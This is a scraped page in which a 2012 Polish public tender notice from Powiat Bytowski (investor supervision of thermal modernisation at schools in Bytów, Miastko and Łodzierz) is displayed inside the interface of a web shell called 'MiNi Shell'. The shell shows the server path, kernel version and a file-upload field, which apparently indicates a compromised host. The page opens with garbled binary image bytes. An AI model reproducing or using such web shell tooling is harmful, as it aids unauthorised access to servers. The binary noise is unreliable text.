JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120625/217592-N-2012.html

<p class="kh_header"><b>Bytów: NADZÓR INWESTORSKI NAD REALIZACJĄ INWESTYCJI: SZANUJMY ENERGIĘ. KOMPLEKSOWA TERMOMODERNIZACJA BAZY DYDAKTYCZNEJ PLACÓWEK OŚWIATOWYCH POWIATU BYTOWSKIEGO</b><br>
<b>Numer ogłoszenia: 217592 - 2012; data zamieszczenia: 25.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bytowski , ul. Ks. dr. Bolesława Domańskiego 2, 77-100 Bytów, woj. pomorskie, tel. 59 822 80 00, faks 59 822 80 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbytowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NADZÓR INWESTORSKI NAD REALIZACJĄ INWESTYCJI: SZANUJMY ENERGIĘ. KOMPLEKSOWA TERMOMODERNIZACJA BAZY DYDAKTYCZNEJ PLACÓWEK OŚWIATOWYCH POWIATU BYTOWSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest nadzór inwestorski nad realizacją inwestycji: Szanujmy energię. Kompleksowa termomodernizacja bazy dydaktycznej placówek oświatowych Powiatu Bytowskiego. Zgodnie z art. 25 ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz.U.2010.243.1623 j.t.) zwanej dalej Prawem Budowlanym zakres przedmiotu zamówienia obejmuje:
a)	reprezentowanie Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem,  przepisami oraz zasadami wiedzy technicznej.
b)	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, 
a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych 
i niedopuszczonych do stosowania w budownictwie.
c)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania.
d)	potwierdzanie faktyczne wykonanych robót oraz usunięcia wad.

Zakres inwestycji obejmuje:
Termomodernizację przy zastosowaniu odnawialnych źródeł energii budynków dydaktycznych Specjalnego Ośrodka Szkolno-Wychowawczego w Bytowie
Opis stanu istniejącego.
Zespół budynków składa się z dwóch obiektów połączonych ze sobą łącznikiem. Pierwszy budynek (zwany starą częścią) wybudowany został około roku 1910, natomiast część wejściowa została zmodernizowana w latach 70-tych XX wieku. Rzut starej części szkoły jest prostokątny. Jest to obiekt parterowy, częściowo podpiwniczony, przykryty dachem mansardowym z użytkową częścią poddasza. Dach części starej został wyremontowany na początku XXI wieku, wraz z wymianą pokrycia na dachówkę karpiówkę i docieplony wełną mineralną. Od strony północno - wschodniej dobudowany został łącznik z nowym budynkiem szkoły (zwana nową częścią), które powstały w latach 80-tych XX wieku. Łącznik przykryty jest stropodachem płaskim jednospadowym. Nowa część szkoły została wybudowana na rzucie prostokąta, usytuowanym prostopadle do budynku starego. Jest to obiekt pięciokondygnacyjny (piwnica, parter, dwa piętra i poddasze użytkowe). Przykryty jest
dachem dwuspadowym naczółkowym o spadku połaci 44%. Stara część zrealizowana została w technologii tradycyjnej. Ściany zewnętrzne z cegły pełnej, grubości 38cm. Ściany wewnętrzne konstrukcyjne z cegły pełnej gr. 38 i 24cm. Ściany działowe gr. 12cm. Stropy drewniane ze ślepym pułapem. Więźba dachowa wykonana jako drewniana. Pokrycie dachu dachówką ceramiczną karpiówką układana w koronkę. Nowa część posiada konstrukcję szkieletową, żelbetową (słupy żelbetowe ukryte w ścianach). Ściany osłonowe wykonane z bloczków gazobetonowych gr. 38cm. Stropy wykonane jako żelbetowe. Dach o konstrukcji drewnianej pokryty płytami z blachy
ocynkowanej. W budynku starym część okien i wszystkie drzwi zewnętrzne wymienione na PCV. W
części nowej całość stolarki zewnętrznej kwalifikuje się do wymiany
Szczegółowy opis zawarty jest w:
1.	Dodatek Nr 3 : Dokumentacja projektowa: Projekt budowlany termomodernizacji budynków dydaktycznych Specjalnego Ośrodka Szkolno- Wychowawczego w Bytowie
2.	Dodatek Nr 7 : Specyfikacja techniczna wykonania i odbioru robót budowlanych 
3.	Dodatek Nr 8 : Przedmiar  robót: Termomodernizacja budynków Specjalnego Ośrodka Szkolno- Wychowawczego w Bytowie 

Termomodernizację przy zastosowaniu odnawialnych źródeł energii Powiatowego Młodzieżowego Domu Kultury i Warsztatów Zespołu Szkół Ponadgimnazjalnych w Miastku. Remont wewnętrznych szlaków komunikacyjnych i dróg dojazdowych na działce Nr 35/4 w Miastku.
Opis stanu istniejącego.
Budynek wybudowany został w drugiej połowie XX wieku. Budynków składa się z dwóch części - jedna należącą do Powiatowego Młodzieżowego Domu Kultury, a druga do warsztatów szkolnych Zespołu Szkół Ponadgimnazjalnych w Miastku. Rzut budynku jest stworzony na bazie prostokąta. Jest to obiekt parterowy, niepodpiwniczony, przykryty stropodachem. Dach został wyremontowany kilka lat temu, wraz z wymianą pokrycia na styropapę, wymianą obróbek blacharskich, rynien , rur oraz instalacji odgromowej. Budynek zrealizowany został w technologii szkieletowej. Konstrukcje nośną budynku stanowią słupy żelbetowe prefabrykowane o przekroju 30x40cm. Słupy oparte są na stopach żelbetowych. Dach oparty na dźwigarach prefabrykowanych typu SB-I. Konstrukcja stropodachu wykonana z płyty żerań. Ściany zewnętrzne z cegły kratówki, grubości 38cm.
Ściany wewnętrzne konstrukcyjne z cegły wapienno-piaskowej gr. 38 i 25cm. Ściany działowe gr. 12cm. W budynku część okien i drzwi zewnętrznych wymienione na PCV. Budynek jest zasilany w ciepło za pomocą węzła cieplnego zlokalizowanego w sąsiednim budynku szkoły oraz istniejącego przyłącza.
Szczegółowy opis zawarty jest w:
1.	Dodatek Nr 4 : Dokumentacja projektowa: Projekt budowlany termomodernizacji budynku Powiatowego Młodzieżowego Domu Kultury i Warsztatów Zespołu Szkół Ponadgimnazjalnych w Miastku
2.	Dodatek Nr 5 : Projekt zagospodarowania: Remont istniejących obiektów budowlanych , w postaci wewnętrznych szlaków komunikacyjnych i dróg dojazdowych na działce Nr 35/4 w Miastku.
3.	Dodatek Nr 7 : Specyfikacja techniczna wykonania i odbioru robót budowlanych 
4.	Dodatek Nr 9 : Przedmiar  robót: Termomodernizacja budynku Powiatowego Młodzieżowego Domu Kultury i Warsztatów Zespołu Szkół Ponadgimnazjalnych w Miastku
5.	Dodatek Nr 10: Przedmiar robót: Remont istniejących obiektów budowlanych , w postaci wewnętrznych szlaków komunikacyjnych i dróg dojazdowych na działce Nr 35/4 w Miastku.

Termomodernizację przy zastosowaniu odnawialnych źródeł energii kompleksu Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Łodzierzy. 

Opis stanu istniejącego.
Zespół budynków szkoły powstawał w latach 1985 - 1989. Składają się na niego trzy duże obiekty kubaturowe z łącznikami:
- parterowy budynek administracyjny
- dwukondygnacyjny częściowo podpiwniczony budynek dydaktyczny
- sala gimnastyczna z dwukondygnacyjnym zapleczem.
Zespół administracyjno - dydaktyczny z łącznikami stanowi spójną całość architektoniczną. Równolegle usytuowane obiekty kubaturowe i łączniki kryte są dachami o kącie nachylenia połaci 25°. Sala gimnastyczna przekryta jest dachem dwupołaciowym o kącie nachylenia 3°. Budynki zostały zbudowane w technologii tradycyjnej. Ścianki zewnętrzne wykonano jako warstwowe: 
- budynek administracyjny i dydaktyczny: z cegły ceramicznej pełnej o grubości 6cm, styropianu o grubości 3cm i gazobetonu o grubości 24cm.
- sala gimnastyczna: z cegły ceramicznej pełnej o grubości 12cm, styropianu o grubości 5cm i płyty konstrukcyjnej o grubości 24cm.
- strop miedzy kondygnacjami: z płyt konstrukcyjnych o grubości 24cm.
Nad ostatnią kondygnacją użytkową znajduje się nieogrzewane poddasze, strop pod poddaszem ocieplony jest wełną mineralną gr. 12cm. W budynkach część stolarki zewnętrznej wymieniona na PCV.      
Szczegółowy opis zawarty jest w:
1.	Dodatek Nr 6 : Dokumentacja projektowa: Projekt budowlany termomodernizacji budynków Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Łodzierzy 
2.	Dodatek Nr 7 : Specyfikacja techniczna wykonania i odbioru robót budowlanych 
3.	Dodatek Nr 11 : Przedmiar  robót: Termomodernizacja budynków Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Łodzierzy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do niniejszego postępowania nie jest zobowiązany wnieść wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz winien obejmować: minimum jedno zamówienie obejmujące swoim zakresem nadzór inwestorski nad  kompleksową termomodernizacją obiektów użyteczności publicznej o wartości robót budowlanych minimum 500 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń  w specjalności konstrukcyjno -budowlanej, 
Osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń  w specjalności instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych 
Do pełnienia obowiązków inspektora nadzoru inwestorskiego (w specjalności konstrukcyjno- budowlanej) oraz posiadają wymagane uprawnienia określone ustawą z dnia 7 lipca 1994r. Prawo Budowlane (Dz. U. z 10r. Nr 243, poz. 1623,jednolity tekst) 
Do pełnienia obowiązków inspektora nadzoru inwestorskiego w specjalności instalacyjnej odpowiednio: w zakresie sieci i instalacji wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych oraz posiadają wymagane uprawnienia określone ustawą z dnia 7 lipca 1994r. Prawo Budowlane (Dz. U. z 10r. Nr 243, poz. 1623,jednolity tekst)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy: 
A.	Zamawiający zastrzega sobie prawo odstąpienia od umowy  bez obowiązku wypłaty odszkodowania na rzecz Wykonawcy w przypadku:
wystąpienia okoliczności powodujących, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania umowy; odstąpienie od umowy, w tym przypadku może nastąpić w terminie 1 miesiąca od daty powzięcia wiadomości o powyższych okolicznościach.

B.	Zmiana sposobu spełnienia świadczenia na skutek niemożności realizacji  inwestycji przez uczestników procesu budowlanego:
1)	dopuszcza się zmianę osób pełniących obowiązki Inspektora Nadzoru Inwestorskiego. 
2)	dopuszcza się zmianę koordynatora nadzoru inwestorskiego. 

C.	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1)	zmianą sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiatbytowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Ks. dr Bolesława Domańskiego 2, 77-100 Bytów, pokój nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 10:00, miejsce: Starostwo Powiatowe, ul. Ks. dr Bolesława Domańskiego 2, 77-100 Bytów - Biuro Obsługi Klienta (pok. nr 106).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejska ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007-2013. Oś priorytetowa 5 Środowisko i energetyka przyjazna środowisku, Działanie 5.5 Infrastruktura energetyczna i poszanowanie energii.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com